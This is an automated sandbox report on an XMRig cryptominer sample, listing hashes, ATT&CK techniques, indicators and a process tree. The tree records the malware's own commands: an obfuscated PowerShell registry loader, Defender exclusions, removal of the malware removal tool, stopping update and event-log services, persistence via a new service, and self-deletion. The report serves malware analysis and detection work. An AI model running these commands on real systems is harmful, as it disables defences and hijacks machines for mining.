xmrig | 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251

Analysis

max time kernel
150s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-12-2024 10:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
Size

5.2MB
MD5

3cae1f11044d2ca787824610a40f1696
SHA1

bf4af642f36e87b887f973f47a46bcb2e656c636
SHA256

50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
SHA512

0918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7
SSDEEP

98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8

Score

10^/10

xmrig evasion execution miner persistence upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1792 created 432	1792	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/1092-47-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-52-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-53-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-51-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-50-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-49-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/1092-46-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1792	powershell.EXE
2100	powershell.exe
2612	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Deletes itself 1 IoCs

pid	Process
2164	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
476	services.exe
2276	weiuemyrzjra.exe

Loads dropped DLL 1 IoCs

pid	Process
476	services.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2212	powercfg.exe
2548	powercfg.exe
1864	powercfg.exe
2204	powercfg.exe
2228	powercfg.exe
2376	powercfg.exe
448	powercfg.exe
2248	powercfg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	weiuemyrzjra.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1400 set thread context of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 2276 set thread context of 2120	2276	weiuemyrzjra.exe	92
PID 2276 set thread context of 1304	2276	weiuemyrzjra.exe	94
PID 2276 set thread context of 1092	2276	weiuemyrzjra.exe	95
PID 1792 set thread context of 1768	1792	powershell.EXE	96

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1092-41-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-47-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-52-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-53-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-51-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-50-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-49-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-46-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-44-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-43-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-45-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/1092-42-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2776	sc.exe
2364	sc.exe
2192	sc.exe
2896	sc.exe
2712	sc.exe
2564	sc.exe
2668	sc.exe
3000	sc.exe
2040	sc.exe
2864	sc.exe
1256	sc.exe
1960	sc.exe
296	sc.exe
1536	sc.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00abeb8e8257db01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
2100	powershell.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
2276	weiuemyrzjra.exe
2612	powershell.exe
1792	powershell.EXE
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
2276	weiuemyrzjra.exe
1792	powershell.EXE
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeShutdownPrivilege	2548	powercfg.exe
Token: SeShutdownPrivilege	2212	powercfg.exe
Token: SeShutdownPrivilege	1864	powercfg.exe
Token: SeShutdownPrivilege	2248	powercfg.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	1792	powershell.EXE
Token: SeShutdownPrivilege	2228	powercfg.exe
Token: SeShutdownPrivilege	2204	powercfg.exe
Token: SeShutdownPrivilege	2376	powercfg.exe
Token: SeShutdownPrivilege	448	powercfg.exe
Token: SeLockMemoryPrivilege	1092	dialer.exe
Token: SeDebugPrivilege	1792	powershell.EXE
Token: SeDebugPrivilege	1768	dllhost.exe
Token: SeAuditPrivilege	872	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 2572	2172	cmd.exe	39
PID 2172 wrote to memory of 2572	2172	cmd.exe	39
PID 2172 wrote to memory of 2572	2172	cmd.exe	39
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 1400 wrote to memory of 1528	1400	50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe	52
PID 2164 wrote to memory of 1168	2164	cmd.exe	66
PID 2164 wrote to memory of 1168	2164	cmd.exe	66
PID 2164 wrote to memory of 1168	2164	cmd.exe	66
PID 2064 wrote to memory of 1792	2064	taskeng.exe	68
PID 2064 wrote to memory of 1792	2064	taskeng.exe	68
PID 2064 wrote to memory of 1792	2064	taskeng.exe	68
PID 1336 wrote to memory of 2908	1336	cmd.exe	76
PID 1336 wrote to memory of 2908	1336	cmd.exe	76
PID 1336 wrote to memory of 2908	1336	cmd.exe	76
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 2120	2276	weiuemyrzjra.exe	92
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1304	2276	weiuemyrzjra.exe	94
PID 2276 wrote to memory of 1092	2276	weiuemyrzjra.exe	95
PID 2276 wrote to memory of 1092	2276	weiuemyrzjra.exe	95
PID 2276 wrote to memory of 1092	2276	weiuemyrzjra.exe	95
PID 2276 wrote to memory of 1092	2276	weiuemyrzjra.exe	95
PID 2276 wrote to memory of 1092	2276	weiuemyrzjra.exe	95
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1792 wrote to memory of 1768	1792	powershell.EXE	96
PID 1768 wrote to memory of 432	1768	dllhost.exe	5
PID 1768 wrote to memory of 476	1768	dllhost.exe	6
PID 1768 wrote to memory of 492	1768	dllhost.exe	7
PID 1768 wrote to memory of 500	1768	dllhost.exe	8
PID 1768 wrote to memory of 604	1768	dllhost.exe	9
PID 1768 wrote to memory of 688	1768	dllhost.exe	10
PID 1768 wrote to memory of 756	1768	dllhost.exe	11
PID 1768 wrote to memory of 828	1768	dllhost.exe	12
PID 1768 wrote to memory of 872	1768	dllhost.exe	13
PID 1768 wrote to memory of 984	1768	dllhost.exe	15
PID 1768 wrote to memory of 272	1768	dllhost.exe	16
PID 1768 wrote to memory of 308	1768	dllhost.exe	17
PID 1768 wrote to memory of 1080	1768	dllhost.exe	18
PID 1768 wrote to memory of 1120	1768	dllhost.exe	19
PID 1768 wrote to memory of 1176	1768	dllhost.exe	20
PID 1768 wrote to memory of 1204	1768	dllhost.exe	21
PID 1768 wrote to memory of 1568	1768	dllhost.exe	23

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e7f15a13-5bef-4f8f-b7af-38e2dbd26443}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1768

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1568
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1644
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:688
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:756
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:828
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1176
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {0EC33BF6-F249-4A6C-949F-9F4F860C29D6} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+'d'+'ialer'+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1792
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:984
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:308
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1080
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1120
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1284
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2244
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2352
- C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
  C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2908
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1960
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2364
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:296
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2192
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2376
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:448
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2120
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:1304
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
  "C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:2572
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2712
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2564
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2668
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:1528
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "HGLZSDMZ"
    3⤵
    - Launches sc.exe
    PID:3000
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1256
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "HGLZSDMZ"
    3⤵
    - Launches sc.exe
    PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:1168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\Tasks\dialersvc64

Filesize
3KB

MD5
1e74c1252f4651139a20910689f2c632

SHA1
2ddec8df63691ad09f128a6f8922b00e7efbf8fc

SHA256
e4e64ec675a402dc5263f671ed84fbd1c792dd56b02de53589e6d3da5ba3dd00

SHA512
a93815011b56120d880c02211a46a1395089527588f7e73a7a943d66c0c150b6e852b9217ec184e6c07086b3ecf6f76b1fe93fdaee03dc1ee2f4be6e896f621f

Download Submit
\ProgramData\fimdesrsuelr\weiuemyrzjra.exe

Filesize
5.2MB

MD5
3cae1f11044d2ca787824610a40f1696

SHA1
bf4af642f36e87b887f973f47a46bcb2e656c636

SHA256
50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251

SHA512
0918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7

Download Submit
memory/432-68-0x0000000000ED0000-0x0000000000EF5000-memory.dmp

Filesize
148KB

Download
memory/432-70-0x0000000000ED0000-0x0000000000EF5000-memory.dmp

Filesize
148KB

Download
memory/432-71-0x0000000000F00000-0x0000000000F2B000-memory.dmp

Filesize
172KB

Download
memory/432-72-0x0000000000F00000-0x0000000000F2B000-memory.dmp

Filesize
172KB

Download
memory/432-78-0x0000000000F00000-0x0000000000F2B000-memory.dmp

Filesize
172KB

Download
memory/432-79-0x000007FEBE510000-0x000007FEBE520000-memory.dmp

Filesize
64KB

Download
memory/432-80-0x0000000037C80000-0x0000000037C90000-memory.dmp

Filesize
64KB

Download
memory/476-86-0x00000000000E0000-0x000000000010B000-memory.dmp

Filesize
172KB

Download
memory/1092-49-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-43-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-50-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-44-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-46-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-48-0x0000000000130000-0x0000000000150000-memory.dmp

Filesize
128KB

Download
memory/1092-45-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-41-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-47-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-52-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-53-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-51-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1092-42-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1304-32-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1304-34-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1304-33-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1304-31-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
